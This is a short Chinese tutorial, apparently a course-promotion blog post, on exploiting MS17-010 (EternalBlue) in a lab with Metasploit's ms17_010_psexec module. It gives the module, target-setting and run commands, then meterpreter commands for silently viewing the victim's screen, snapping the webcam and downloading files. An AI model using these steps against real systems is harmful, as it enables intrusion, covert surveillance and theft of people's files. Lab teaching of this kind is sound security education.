用于网络安全教学,切勿用于不当目的!
永恒之蓝
永恒之蓝,安全补丁漏洞代号ms17-010。允许远程执行恶意代码,触发目标主机的缓存区溢出漏洞,从而实现获得目标系统权限!
攻击机:kali-2020
靶机:windows
使用我们的nessus漏洞扫描器对靶机进行扫描,并查看之前扫描的漏洞报告说明:
大家看到,这里除了ms08-067,还有我们今天要测试的ms17-010,下面就开始测试利用吧!
Ms17-010漏洞利用"入侵"
打开kali,终端下输入msfconsole,并配置相关模块参数。
use exploit/windows/smb/ms17_010_psexec
使用ms17-010模块
show options
显示需要设置的参数
set RHOSTS 192.168.31.34
设置目标靶机的ip地址
run
执行!
如果利用成功,就会建立meterpreter会话!
一旦成功利用windows xp靶机的ms17-010漏洞,靶机就会反弹一个连接tcp连接到我们的kali主机中,就会建立meterpreter会话,如图:
实战例子
获得了meterpreter会话后,你就可以使用"?"查询可以使用的用于控制机靶机的命令参数,这里我们仅仅例举几个常用的伎俩。
- 比如,你可以在meterpreter会话后面输入命令screenshare,就能实时查看对方的电脑桌面,是不是很邪恶?这里仅仅用作测试教学哈!
- 比如,你还可以使用webcam_snap获取对方电脑的摄像头,实时查看,听起来就有点毛骨悚然了。
- 最后再给一个,比如download,可以指定下载对方电脑的硬盘文件等资源,如果你在电脑确实存有自己的照片。
以上这些都是在后台以静默的方式进行远控操作,原因在于我们已经利用永恒之蓝获得了靶机的所有权限。综上所述,电脑用户应该及时更新自己的电脑系统,打好补丁,不然下一个被“玩”的可能真的是你了!
想获取更多学习,可以点击《白帽黑客kali渗透实战指南》进行深入学习。全程实战指导,干货满满,小白也能从入门到实战。
关注小白嘿客,一起学习,一起成长!点击以下课程专栏,了解更多。